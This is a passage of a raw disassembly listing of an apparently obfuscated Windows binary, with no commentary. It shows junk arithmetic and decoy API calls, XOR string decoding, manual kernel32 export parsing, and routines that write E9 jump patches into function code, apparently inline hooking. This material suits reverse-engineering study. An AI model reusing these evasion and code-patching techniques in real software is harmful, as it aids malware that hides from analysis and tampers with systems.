or eax, 0FFFFFFFFh
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_8]
lea edx, [edx+ecx+5]
add edx, ebx
sub edx, 4
sub eax, edx
add eax, [ebp+var_18]
sub eax, 4
mov [ebp+var_1C], eax
mov [ebp+var_10], 44FEh
movzx eax, [ebp+var_10]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_10], ax
mov eax, [ebp+arg_4]
mov edx, ecx
lea eax, [eax+edx+5]
add eax, ebx
sub eax, 4
mov edx, [ebp+var_1C]
mov ds:1[eax], edx
jmp short loc_4027FE
; ---------------------------------------------------------------------------
loc_4027D9: ; CODE XREF: sub_402651+B3�j
; sub_402651+C2�j ...
movzx eax, [ebp+var_2]
imul eax, 0Ch
cmp off_43D0C8[eax], 0
jz short loc_4027FE
lea edi, [ebp+var_E]
lea esi, aJt16gz ; "jT1 6GZ"
movsd
movsd
add [ebp+var_2], 1
jmp loc_4026EC
; ---------------------------------------------------------------------------
loc_4027FE: ; CODE XREF: sub_402651+186�j
; sub_402651+197�j
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 4
jnz short loc_40286C
mov edx, ebx
dec edx
cmp byte ptr [eax+edx], 4
jnz short loc_40286C
mov edx, ebx
sub edx, 2
cmp byte ptr [eax+edx], 4
jnz short loc_40286C
mov edx, ebx
sub edx, 3
cmp byte ptr [eax+edx], 4
jnz short loc_40286C
mov edx, ebx
sub edx, 4
movzx edx, byte ptr [eax+edx]
cmp dl, 68h
jz short loc_402847
cmp edx, 0BEh
jz short loc_402847
mov edx, ebx
sub edx, 5
cmp byte ptr [eax+edx], 24h
jnz short loc_40286C
loc_402847: ; CODE XREF: sub_402651+1E1�j
; sub_402651+1E9�j
mov [ebp+var_14], 1FF1h
add [ebp+var_14], 6329h
mov eax, [ebp+arg_4]
add eax, [ebp+arg_8]
lea edx, [eax+ebx+5]
sub edx, 4
add eax, 7
mov ds:1[edx], eax
loc_40286C: ; CODE XREF: sub_402651+1B4�j
; sub_402651+1BD�j ...
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 2
jnz loc_4028FC
mov edx, ebx
dec edx
cmp byte ptr [eax+edx], 2
jnz short loc_4028FC
mov edx, ebx
sub edx, 2
cmp byte ptr [eax+edx], 2
jnz short loc_4028FC
mov edx, ebx
sub edx, 3
cmp byte ptr [eax+edx], 2
jnz short loc_4028FC
mov edx, ebx
sub edx, 4
movzx eax, byte ptr [eax+edx]
cmp eax, 0E8h
jz short loc_4028AF
cmp eax, 0E9h
jnz short loc_4028FC
loc_4028AF: ; CODE XREF: sub_402651+255�j
mov [ebp+var_10], 23Dh
add [ebp+var_10], 6F30h
mov eax, [ebp+arg_4]
or edx, 0FFFFFFFFh
mov ecx, [ebp+arg_8]
lea ecx, [eax+ecx+5]
add ecx, ebx
sub ecx, 4
sub edx, ecx
add edx, eax
mov eax, edx
sub eax, 4
mov [ebp+var_14], eax
call sub_40C998 ; GetProcessHeap
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_8]
lea eax, [eax+edx+5]
add eax, ebx
sub eax, 4
mov edx, [ebp+var_14]
mov ds:1[eax], edx
call sub_40CA58 ; IsDebuggerPresent
loc_4028FC: ; CODE XREF: sub_402651+222�j
; sub_402651+22F�j ...
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 1
jnz short loc_402964
mov edx, ebx
dec edx
cmp byte ptr [eax+edx], 1
jnz short loc_402964
mov edx, ebx
sub edx, 2
cmp byte ptr [eax+edx], 1
jnz short loc_402964
mov edx, ebx
sub edx, 3
cmp byte ptr [eax+edx], 1
jnz short loc_402964
mov edx, ebx
sub edx, 4
movzx eax, byte ptr [eax+edx]
cmp al, 3Dh
jz short loc_40293F
cmp eax, 0FEh
jz short loc_40293F
cmp eax, 0FFh
jnz short loc_402964
loc_40293F: ; CODE XREF: sub_402651+2DE�j
; sub_402651+2E5�j
call sub_40C938 ; GetCurrentProcessId
call sub_40C938 ; GetCurrentProcessId
mov edi, [ebp+arg_4]
mov esi, [ebp+arg_8]
lea edi, [edi+esi+5]
add edi, ebx
sub edi, 4
mov ds:1[edi], eax
call sub_40C9D4 ; GetVersion
loc_402964: ; CODE XREF: sub_402651+2B2�j
; sub_402651+2BB�j ...
inc ebx
cmp ebx, 400h
jb loc_402669
loc_402971: ; CODE XREF: sub_402651+69�j
pop edi
pop esi
pop ebx
leave
retn
sub_402651 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402976 proc near ; CODE XREF: sub_402B9B+7A9�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = word ptr -24h
var_22 = byte ptr -22h
var_21 = word ptr -21h
var_1F = byte ptr -1Fh
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
call sub_40C9C8 ; GetTickCount
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
jmp short loc_4029C8
; ---------------------------------------------------------------------------
loc_40298C: ; CODE XREF: sub_402976+5D�j
mov [ebp+var_28], 665h
add [ebp+var_28], 5DA4h
xor ebx, ebx
jmp short loc_4029A8
; ---------------------------------------------------------------------------
loc_40299E: ; CODE XREF: sub_402976+38�j
mov eax, [ebp+var_4]
cmp byte ptr [eax+ebx], 0
jnz short loc_4029B0
inc ebx
loc_4029A8: ; CODE XREF: sub_402976+26�j
cmp ebx, 3E8h
jbe short loc_40299E
loc_4029B0: ; CODE XREF: sub_402976+2F�j
mov eax, dword_43D13B
mov [ebp+var_2C], eax
cmp ebx, 3E8h
jnb short loc_4029DA
call sub_40C938 ; GetCurrentProcessId
inc [ebp+var_4]
loc_4029C8: ; CODE XREF: sub_402976+14�j
mov eax, [ebp+arg_4]
sub eax, 3E8h
cmp [ebp+var_4], eax
jbe short loc_40298C
jmp loc_402B96
; ---------------------------------------------------------------------------
loc_4029DA: ; CODE XREF: sub_402976+48�j
add [ebp+var_4], 0Ah
movzx edi, [ebp+arg_8]
shl edi, 2
mov ebx, ds:dword_40F370[edi]
and [ebp+var_8], 0
loc_4029F0: ; CODE XREF: sub_402976+161�j
mov eax, ebx
add eax, [ebp+var_8]
push eax
call sub_401DB9
pop ecx
mov eax, [ebp+var_8]
movzx eax, byte ptr [ebx+eax]
cmp eax, 0E8h
jz short loc_402A48
cmp eax, 0E9h
jz short loc_402A48
lea edi, [ebp+var_28+2]
lea esi, aJ8 ; " j8 "
mov ecx, 5
rep movsb
and [ebp+var_C], 0
jmp short loc_402A39
; ---------------------------------------------------------------------------
loc_402A27: ; CODE XREF: sub_402976+CB�j
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov edx, [ebp+var_4]
mov cl, [ebx+eax]
mov [edx+eax], cl
inc [ebp+var_C]
loc_402A39: ; CODE XREF: sub_402976+AF�j
mov eax, ds:dword_40E064
cmp [ebp+var_C], eax
jb short loc_402A27
jmp loc_402ACB
; ---------------------------------------------------------------------------
loc_402A48: ; CODE XREF: sub_402976+92�j
; sub_402976+99�j
lea edi, [ebp+var_28+1]
lea esi, a2g ; "2G"
mov ecx, 3
rep movsb
mov eax, [ebp+var_8]
mov edx, [ebp+var_4]
mov cl, [ebx+eax]
mov [edx+eax], cl
mov ax, word_43D147
mov word ptr [ebp+var_2C+3], ax
mov eax, [ebp+var_8]
lea eax, [ebx+eax+1]
mov eax, [eax]
mov [ebp+var_10], eax
mov [ebp+var_24], 0FCCh
movzx eax, [ebp+var_24]
imul eax, 2308h
mov [ebp+var_24], ax
mov eax, [ebp+var_8]
mov edx, [ebp+var_10]
mov ecx, [ebp+var_4]
add ecx, eax
sub edx, ecx
mov ecx, ebx
add ecx, eax
mov eax, edx
add eax, ecx
mov [ebp+var_1C], eax
call sub_40C938 ; GetCurrentProcessId
mov eax, [ebp+var_4]
mov edx, [ebp+var_8]
lea eax, [eax+edx+1]
mov edx, [ebp+var_1C]
mov [eax], edx
mov [ebp+var_22], 0FAh
movzx eax, [ebp+var_22]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_22], al
loc_402ACB: ; CODE XREF: sub_402976+CD�j
mov eax, ds:dword_40E064
add [ebp+var_8], eax
cmp [ebp+var_8], 5
jb loc_4029F0
lea edi, [ebp+var_1F]
lea esi, byte_43D149
mov ecx, 3
rep movsb
mov eax, [ebp+var_8]
or edx, 0FFFFFFFFh
mov ecx, [ebp+var_4]
add ecx, eax
sub edx, ecx
mov ecx, ebx
add ecx, eax
mov eax, edx
add eax, ecx
sub eax, 4
mov [ebp+var_10], eax
call sub_40CA58 ; IsDebuggerPresent
mov eax, [ebp+var_4]
mov edx, [ebp+var_8]
mov byte ptr [edx+eax], 0E9h
lea eax, [eax+edx+1]
mov edx, [ebp+var_10]
mov [eax], edx
mov ax, word_43D14C
mov [ebp+var_21], ax
or eax, 0FFFFFFFFh
sub eax, ebx
mov edx, [ebp+var_4]
mov ecx, [ebp+var_8]
lea edx, [edx+ecx+5]
add eax, edx
sub eax, 4
mov [ebp+var_10], eax
mov [ebp+var_14], 1C36h
add [ebp+var_14], 0B12h
mov byte ptr [ebx], 0E9h
mov [ebp+var_12], 3735h
movzx eax, [ebp+var_12]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_12], ax
mov eax, [ebp+var_10]
mov ds:1[ebx], eax
push ecx
push [ebp+var_4]
movzx edi, [ebp+arg_8]
shl edi, 4
push off_43CEA0[edi]
call sub_402651
add esp, 0Ch
mov [ebp+var_18], 49Ch
add [ebp+var_18], 2296h
loc_402B96: ; CODE XREF: sub_402976+5F�j
pop edi
pop esi
pop ebx
leave
retn
sub_402976 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402B9B proc near ; CODE XREF: sub_40AB84+53F�p
var_257C = dword ptr -257Ch
var_2578 = dword ptr -2578h
var_21AA = word ptr -21AAh
var_21A8 = byte ptr -21A8h
var_21A5 = byte ptr -21A5h
var_21A4 = dword ptr -21A4h
var_21A0 = word ptr -21A0h
var_219E = byte ptr -219Eh
var_2196 = byte ptr -2196h
var_218E = word ptr -218Eh
var_218C = byte ptr -218Ch
var_218B = byte ptr -218Bh
var_2188 = dword ptr -2188h
var_2184 = dword ptr -2184h
var_2180 = dword ptr -2180h
var_217C = dword ptr -217Ch
var_2175 = byte ptr -2175h
var_2174 = word ptr -2174h
var_2172 = word ptr -2172h
var_2170 = dword ptr -2170h
var_206C = dword ptr -206Ch
var_2067 = byte ptr -2067h
var_2064 = dword ptr -2064h
var_2060 = dword ptr -2060h
var_205C = dword ptr -205Ch
var_2058 = dword ptr -2058h
var_2053 = byte ptr -2053h
var_2052 = word ptr -2052h
var_2050 = dword ptr -2050h
var_204C = dword ptr -204Ch
var_2044 = dword ptr -2044h
var_2034 = dword ptr -2034h
var_2030 = dword ptr -2030h
var_202C = dword ptr -202Ch
var_2025 = byte ptr -2025h
var_2024 = dword ptr -2024h
var_2020 = dword ptr -2020h
var_101C = dword ptr -101Ch
var_1015 = byte ptr -1015h
var_1014 = dword ptr -1014h
var_1010 = dword ptr -1010h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
mov eax, 257Ch
call sub_40C8BC
push ebx
push esi
push edi
lea edi, [ebp+var_2067]
lea esi, word_43D14E
mov ecx, 3
rep movsb
call sub_4022C3
call sub_40C9D4 ; GetVersion
mov [ebp+var_2025], 0
call sub_40C9D4 ; GetVersion
cmp eax, 80000000h
jnb short loc_402BE2
mov [ebp+var_2025], 1
loc_402BE2: ; CODE XREF: sub_402B9B+3E�j
call sub_40C9D4 ; GetVersion
mov [ebp+var_1015], 0
loc_402BEE: ; CODE XREF: sub_402B9B+117�j
cmp [ebp+var_2025], 0
jnz short loc_402C0B
movzx edi, [ebp+var_1015]
shl edi, 4
cmp byte_43CEA4[edi], 1
jz short loc_402C28
loc_402C0B: ; CODE XREF: sub_402B9B+5A�j
cmp [ebp+var_2025], 0
jz short loc_402C2A
movzx edi, [ebp+var_1015]
shl edi, 4
cmp byte_43CEA4[edi], 2
jnz short loc_402C2A
loc_402C28: ; CODE XREF: sub_402B9B+6E�j
jmp short loc_402C99
; ---------------------------------------------------------------------------
loc_402C2A: ; CODE XREF: sub_402B9B+77�j
; sub_402B9B+8B�j
call sub_40C998 ; GetProcessHeap
movzx edi, [ebp+var_1015]
mov esi, edi
shl esi, 4
push off_43CE9C[esi]
call sub_40CA64 ; LoadLibraryA
mov ds:dword_414EF0[edi*4], eax
call sub_40C9D4 ; GetVersion
movzx edi, [ebp+var_1015]
mov esi, edi
shl esi, 4
push off_43CE98[esi]
shl edi, 2
push ds:dword_414EF0[edi]
call sub_40C98C ; GetProcAddress
mov ds:dword_40F370[edi], eax
mov [ebp+var_2052], 3A16h
movzx eax, [ebp+var_2052]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2052], ax
loc_402C99: ; CODE XREF: sub_402B9B:loc_402C28�j
add [ebp+var_1015], 1
movzx edi, [ebp+var_1015]
shl edi, 4
cmp off_43CE98[edi], 0
jnz loc_402BEE
mov [ebp+var_1015], 0
loc_402CBF: ; CODE XREF: sub_402B9B+82B�j
movzx edi, [ebp+var_1015]
shl edi, 2
cmp ds:dword_40F370[edi], 0
jz loc_4033AD
movzx edi, [ebp+var_1015]
shl edi, 2
mov edi, ds:dword_414EF0[edi]
mov [ebp+var_2034], edi
cmp [ebp+var_2025], 0
jz loc_402F75
mov [ebp+var_218E], 231Eh
movzx eax, [ebp+var_218E]
imul eax, 12D1h
mov [ebp+var_218E], ax
call sub_402353
mov [ebp+var_2030], eax
call sub_40C9C8 ; GetTickCount
shr edi, 16h
shl edi, 16h
mov [ebp+var_8], edi
lea edi, [ebp+var_2196]
lea esi, aI4Ti ; "i^4$~TI"
movsd
movsd
mov eax, [ebp+var_8]
add eax, 400000h
mov [ebp+var_1014], eax
xor ebx, ebx
jmp short loc_402DA1
; ---------------------------------------------------------------------------
loc_402D51: ; CODE XREF: sub_402B9B+20F�j
lea edi, [ebp+var_21A8]
lea esi, aVdeND ; "VDe>N;d"
movsd
movsd
mov eax, dword_43D014
add eax, 0FFAh
push eax
push [ebp+var_8]
call sub_40CA40 ; IsBadReadPtr
mov [ebp+var_4], eax
mov [ebp+var_21A0], 5DBCh
sub [ebp+var_21A0], 0A4Ch
xor [ebp+var_4], 1
shl [ebp+var_4], 2
mov edi, [ebp+var_4]
mov [ebp+ebx*4+var_1010], edi
inc ebx
add [ebp+var_8], 1000h
loc_402DA1: ; CODE XREF: sub_402B9B+1B4�j
mov eax, [ebp+var_1014]
cmp [ebp+var_8], eax
jbe short loc_402D51
lea eax, [ebp+var_218C]
push eax
call sub_40CA28 ; GlobalMemoryStatus
call sub_40C968 ; RtlGetLastWin32Error
and [ebp+var_101C], 0
jmp loc_402ECD
; ---------------------------------------------------------------------------
loc_402DC9: ; CODE XREF: sub_402B9B+343�j
call sub_40CA58 ; IsDebuggerPresent
push 0FFFFh
push [ebp+var_101C]
push [ebp+var_2030]
call sub_402528
add esp, 0Ch
mov [ebp+var_C], eax
mov [ebp+var_21A5], 0BBh
add [ebp+var_21A5], 0Bh
test eax, eax
jnz short loc_402E1E
mov [ebp+var_21AA], 1CC0h
movzx eax, [ebp+var_21AA]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_21AA], ax
jmp loc_402EC3
; ---------------------------------------------------------------------------
loc_402E1E: ; CODE XREF: sub_402B9B+25F�j
and [ebp+var_21A4], 0
loc_402E25: ; CODE XREF: sub_402B9B+80D�j
mov eax, [ebp+var_21A4]
mov [ebp+var_8], eax
jmp short loc_402E9E
; ---------------------------------------------------------------------------
loc_402E30: ; CODE XREF: sub_402B9B+30A�j
call sub_40CA58 ; IsDebuggerPresent
xor ebx, ebx
loc_402E37: ; CODE XREF: sub_402B9B+2DD�j
call sub_40C9C8 ; GetTickCount
mov edi, [ebp+var_8]
shr edi, 2
shl edi, 2
add edi, [ebp+var_C]
mov edi, [edi+ebx*4]
mov [ebp+var_4], edi
call sub_40C998 ; GetProcessHeap
and [ebp+var_4], 4
mov edi, [ebp+ebx*4+var_1010]
cmp [ebp+var_4], edi
jnz short loc_402E7A
mov byte ptr [ebp+var_21AA+1], 0E4h
add byte ptr [ebp+var_21AA+1], 1
inc ebx
cmp ebx, 400h
jb short loc_402E37
loc_402E7A: ; CODE XREF: sub_402B9B+2C6�j
cmp ebx, 3FFh
jb short loc_402E97
call sub_40C968 ; RtlGetLastWin32Error
mov eax, [ebp+var_8]
add eax, 1000h
mov [ebp+var_21A4], eax
jmp short loc_402F02
; ---------------------------------------------------------------------------
loc_402E97: ; CODE XREF: sub_402B9B+2E5�j
add [ebp+var_8], 1000h
loc_402E9E: ; CODE XREF: sub_402B9B+293�j
cmp [ebp+var_8], 0F000h
jbe short loc_402E30
push [ebp+var_C]
call sub_4025A2
pop ecx
lea edi, [ebp+var_21A8]
lea esi, aLd ; "lD"
mov ecx, 3
rep movsb
loc_402EC3: ; CODE XREF: sub_402B9B+27E�j
add [ebp+var_101C], 10000h
loc_402ECD: ; CODE XREF: sub_402B9B+229�j
mov eax, [ebp+var_2184]
sub eax, 0FFFFh
cmp [ebp+var_101C], eax
jbe loc_402DC9
push [ebp+var_2030]
call sub_40C9B0 ; CloseHandle
lea edi, [ebp+var_219E]
lea esi, a0htgzcn ; "0htGZCn"
movsd
movsd
jmp loc_4033AD
; ---------------------------------------------------------------------------
loc_402F02: ; CODE XREF: sub_402B9B+2FA�j
movzx edi, [ebp+var_1015]
shl edi, 2
mov edi, ds:dword_40F370[edi]
mov [ebp+var_1014], edi
and [ebp+var_1014], 0
loc_402F20: ; CODE XREF: sub_402B9B+3D8�j
call sub_40CA58 ; IsDebuggerPresent
mov edi, [ebp+var_1014]
shl edi, 2
mov esi, [ebp+var_8]
shr esi, 2
shl esi, 2
add esi, [ebp+var_C]
mov esi, [esi+edi]
mov [ebp+edi+var_2020], esi
mov edi, [ebp+var_1014]
shl edi, 2
mov esi, [ebp+var_8]
shr esi, 2
shl esi, 2
add esi, [ebp+var_C]
add edi, esi
or byte ptr [edi], 2
call sub_40C938 ; GetCurrentProcessId
inc [ebp+var_1014]
cmp [ebp+var_1014], 400h
jb short loc_402F20
loc_402F75: ; CODE XREF: sub_402B9B+15A�j
call sub_40C968 ; RtlGetLastWin32Error
cmp [ebp+var_2025], 0
jnz loc_403048
mov [ebp+var_2174], 2A85h
add [ebp+var_2174], 6FADh
push offset aKernel32_dll ; "kernel32.dll"
call sub_40C980 ; GetModuleHandleA
mov [ebp+var_2170], eax
call sub_40C968 ; RtlGetLastWin32Error
mov eax, [ebp+var_2170]
mov edx, eax
add edx, ds:3Ch[eax]
mov [ebp+var_217C], edx
add edx, 78h
add eax, [edx]
mov [ebp+var_2180], eax
mov [ebp+var_2175], 0D8h
add [ebp+var_2175], 45h
mov eax, [ebp+var_2170]
mov edx, [ebp+var_2180]
add edx, 1Ch
add eax, [edx]
mov [ebp+var_2184], eax
call sub_40CA58 ; IsDebuggerPresent
mov eax, [ebp+var_2170]
mov edx, [ebp+var_2184] ; DATA XREF: .data:loc_44041E�r
; sub_440441+8C�w ...
loc_403004: ; DATA XREF: .data:0043F479�r
; .data:loc_43F4B5�r ...
add eax, [edx]
mov [ebp+var_2188], eax ; DATA XREF: .data:0043F4D4�r
; .data:0043F5A2�w ...
lea edi, [ebp+var_218B]
lea esi, aT_0 ; "^t"
mov ecx, 3
rep movsb
mov eax, [ebp+var_2188]
mov [ebp+var_206C], eax
mov [ebp+var_2172], 4847h
movzx eax, [ebp+var_2172]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2172], ax
loc_403048: ; CODE XREF: sub_402B9B+3E6�j
push 1Ch
lea eax, [ebp+var_2050]
push eax
call sub_40CAC4 ; RtlZeroMemory
mov eax, [ebp+var_2034]
mov [ebp+var_202C], eax
mov [ebp+var_2058], 4084h
mov eax, 41E1h
mul [ebp+var_2058]
mov [ebp+var_2170], eax
mov [ebp+var_2058], eax
loc_403083: ; CODE XREF: sub_402B9B+528�j
; sub_402B9B+560�j
push 1Ch
lea eax, [ebp+var_2050]
push eax
push [ebp+var_202C]
call sub_40CB24 ; VirtualQuery
call sub_40CA58 ; IsDebuggerPresent
mov eax, [ebp+var_2034]
cmp [ebp+var_204C], eax
jnz short loc_4030FD
mov eax, [ebp+var_2044]
mov [ebp+var_2060], eax
add [ebp+var_202C], eax
cmp [ebp+var_2025], 0
jnz short loc_403083
mov [ebp+var_2172], 18F5h
inc [ebp+var_2172]
push 20060000h
push 0
mov edi, [ebp+var_2060]
shr edi, 0Ch
push edi
mov edi, [ebp+var_2050]
shr edi, 0Ch
push edi
push 1000Dh
call [ebp+var_206C]
jmp short loc_403083
; ---------------------------------------------------------------------------
loc_4030FD: ; CODE XREF: sub_402B9B+50D�j
movzx edi, [ebp+var_1015]
shl edi, 2
mov esi, [ebp+var_202C]
sub esi, [ebp+var_2034]
mov ds:dword_411910[edi], esi
mov [ebp+var_2053], 0B3h
movzx eax, [ebp+var_2053]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2053], al
movzx edi, [ebp+var_1015]
shl edi, 2
mov edi, ds:dword_40F370[edi]
mov [ebp+var_1014], edi
mov eax, dword_43D014
add eax, 0FFAh
push eax
push edi
call sub_40CA4C ; IsBadWritePtr
mov [ebp+var_2064], eax
test eax, eax
jnz loc_403351
call sub_40C9D4 ; GetVersion
cmp [ebp+arg_0], 0
jz loc_403330
lea edi, [ebp+var_217C+1]
lea esi, aB7_evf ; "7.Ef"
mov ecx, 7
rep movsb
mov eax, [ebp+var_1014]
movzx eax, byte ptr [eax]
cmp eax, 0E9h
jz short loc_4031C0
mov [ebp+var_257C], 2E94h
inc [ebp+var_257C]
cmp [ebp+arg_0], 1
jnz loc_403330
call sub_40C9D4 ; GetVersion
jmp loc_403351
; ---------------------------------------------------------------------------
loc_4031C0: ; CODE XREF: sub_402B9B+5FF�j
mov eax, [ebp+var_1014]
mov edx, ds:1[eax]
sub edx, 0FFFFFFFFh
lea eax, [edx+eax+4]
mov [ebp+var_2024], eax
call sub_40C944 ; GetCurrentThreadId
mov byte ptr [ebp+var_2172+1], 0
loc_4031E6: ; CODE XREF: sub_402B9B+6FE�j
sub [ebp+var_2024], 5
mov eax, [ebp+var_2024]
mov [ebp+var_4], eax
loc_4031F6: ; CODE XREF: sub_402B9B+69F�j
mov eax, [ebp+var_4]
mov edx, eax
dec edx
cmp byte ptr [edx], 0
jnz short loc_403227
mov edx, eax
sub edx, 2
cmp byte ptr [edx], 0
jnz short loc_403227
mov edx, eax
sub edx, 3
cmp byte ptr [edx], 0
jnz short loc_403227
mov edx, eax
sub edx, 4
cmp byte ptr [edx], 0
jnz short loc_403227
sub eax, 5
cmp byte ptr [eax], 0
jz short loc_40323C
loc_403227: ; CODE XREF: sub_402B9B+664�j
; sub_402B9B+66E�j ...
mov [ebp+var_2174], 0E27h
inc [ebp+var_2174]
dec [ebp+var_4]
jmp short loc_4031F6
; ---------------------------------------------------------------------------
loc_40323C: ; CODE XREF: sub_402B9B+68A�j
movzx edi, byte ptr [ebp+var_2172+1]
shl edi, 2
mov esi, [ebp+var_4]
mov [ebp+edi+var_2578], esi
add byte ptr [ebp+var_2172+1], 1
movzx eax, byte ptr [esi]
cmp eax, 0E9h
jnz short loc_40329E
call sub_40C9C8 ; GetTickCount
mov eax, esi
mov edx, ds:1[eax]
sub edx, 0FFFFFFFFh
lea eax, [edx+eax+4]
mov [ebp+var_2024], eax
mov word ptr [ebp+var_257C+2], 6789h
movzx eax, word ptr [ebp+var_257C+2]
mov edx, eax
add edx, eax
mov eax, edx
mov word ptr [ebp+var_257C+2], ax
jmp loc_4031E6
; ---------------------------------------------------------------------------
loc_40329E: ; CODE XREF: sub_402B9B+6C4�j
mov ebx, [ebp+var_4]
jmp short loc_4032B8
; ---------------------------------------------------------------------------
loc_4032A3: ; CODE XREF: sub_402B9B+723�j
call sub_40C998 ; GetProcessHeap
mov eax, [ebp+var_1014]
add eax, ebx
sub eax, [ebp+var_4]
mov dl, [ebx]
mov [eax], dl
inc ebx
loc_4032B8: ; CODE XREF: sub_402B9B+706�j
cmp ebx, [ebp+var_2024]
jb short loc_4032A3
loc_4032C0: ; CODE XREF: sub_402B9B+788�j
sub byte ptr [ebp+var_2172+1], 1
movzx edi, byte ptr [ebp+var_2172+1]
shl edi, 2
mov ebx, [ebp+edi+var_2578]
loc_4032D8: ; CODE XREF: sub_402B9B+77D�j
mov byte ptr [ebx], 0
call sub_40C9C8 ; GetTickCount
cmp byte ptr ds:1[ebx], 0
jnz short loc_403312
cmp byte ptr ds:2[ebx], 0
jnz short loc_403312
cmp byte ptr ds:3[ebx], 0
jnz short loc_403312
cmp byte ptr ds:4[ebx], 0
jnz short loc_403312
cmp byte ptr ds:5[ebx], 0
jz short loc_40331A
loc_403312: ; CODE XREF: sub_402B9B+74D�j
; sub_402B9B+757�j ...
call sub_40C9D4 ; GetVersion
inc ebx
jmp short loc_4032D8
; ---------------------------------------------------------------------------
loc_40331A: ; CODE XREF: sub_402B9B+775�j
movzx eax, byte ptr [ebp+var_2172+1]
or eax, eax
jg short loc_4032C0
cmp [ebp+arg_0], 1
jz short loc_403351
call sub_40C9D4 ; GetVersion
loc_403330: ; CODE XREF: sub_402B9B+5D8�j
; sub_402B9B+615�j
movzx eax, [ebp+var_1015]
push eax
push [ebp+var_202C]
push [ebp+var_2034]
call sub_402976
add esp, 0Ch
call sub_40C9C8 ; GetTickCount
loc_403351: ; CODE XREF: sub_402B9B+5C9�j
; sub_402B9B+620�j ...
cmp [ebp+var_2025], 0
jz short loc_4033AD
lea edi, [ebp+var_2172+1]
lea esi, word_43D176
xor ecx, ecx
inc ecx
rep movsb
and [ebp+var_1014], 0
loc_403372: ; CODE XREF: sub_402B9B+806�j
mov edi, [ebp+var_1014]
shl edi, 2
mov esi, [ebp+var_8]
shr esi, 2
shl esi, 2
add esi, [ebp+var_C]
mov edx, [ebp+edi+var_2020]
mov [esi+edi], edx
inc [ebp+var_1014]
cmp [ebp+var_1014], 400h
jb short loc_403372
call sub_40C968 ; RtlGetLastWin32Error
jmp loc_402E25
; ---------------------------------------------------------------------------
loc_4033AD: ; CODE XREF: sub_402B9B+136�j
; sub_402B9B+362�j ...
add [ebp+var_1015], 1
movzx edi, [ebp+var_1015]
shl edi, 4
cmp off_43CE98[edi], 0
jnz loc_402CBF
mov [ebp+var_205C], 60F7h
inc [ebp+var_205C]
pop edi
pop esi
pop ebx
leave
retn
sub_402B9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4033E1 proc near ; CODE XREF: sub_403530+38�p
; sub_4035A5+4B�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 2C8h
push esi
push [ebp+arg_0]
mov eax, dword_43D180
lea eax, ds:41D830h[eax]
push eax
call sub_40CE18
add esp, 0Ch
xor edi, edi
jmp short loc_403427
; ---------------------------------------------------------------------------
loc_403410: ; CODE XREF: sub_4033E1+48�j
mov eax, dword_43D180
add eax, edi
lea eax, ds:41D830h[eax]
movsx edx, byte ptr [eax]
xor edx, 4Ah
mov [eax], dl
inc edi
loc_403427: ; CODE XREF: sub_4033E1+2D�j
cmp edi, esi
jl short loc_403410
mov [ebp+var_8], 0DDh
mov eax, dword_43D180
add eax, esi
mov byte ptr ds:dword_41D830[eax], 0
xor edi, edi
mov edi, dword_43D180
inc dword_43D180
mov eax, dword_43D180
add eax, 5
add eax, esi
mov dword_43D180, eax
add dword_43D180, 2
cmp dword_43D180, 0E0Bh
jle short loc_403478
and dword_43D180, 0
loc_403478: ; CODE XREF: sub_4033E1+8E�j
mov [ebp+var_C], 2Eh
lea eax, dword_41D830[edi]
pop edi
pop esi
leave
retn
sub_4033E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403489 proc near ; CODE XREF: sub_403530+27�p
; sub_4035A5+3A�p
var_7 = byte ptr -7
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call sub_40C9C8 ; GetTickCount
call sub_40C998 ; GetProcessHeap
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_4034A3: ; CODE XREF: sub_403489+1F�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4034A3
mov edi, eax
mov [ebp+var_6], di
call sub_40C998 ; GetProcessHeap
mov ax, [ebp+var_6]
mov [ebp+var_2], ax
jmp short loc_4034E6
; ---------------------------------------------------------------------------
loc_4034BF: ; CODE XREF: sub_403489+63�j
movzx eax, [ebp+var_2]
cmp byte ptr [ebx+eax], 5Ch
jnz short loc_4034E2
lea edi, [ebp+var_7]
lea esi, byte_43D184
xor ecx, ecx
inc ecx
rep movsb
inc [ebp+var_2]
call sub_40C938 ; GetCurrentProcessId
jmp short loc_4034EE
; ---------------------------------------------------------------------------
loc_4034E2: ; CODE XREF: sub_403489+3E�j
dec [ebp+var_2]
loc_4034E6: ; CODE XREF: sub_403489+34�j
movzx eax, [ebp+var_2]
or eax, eax
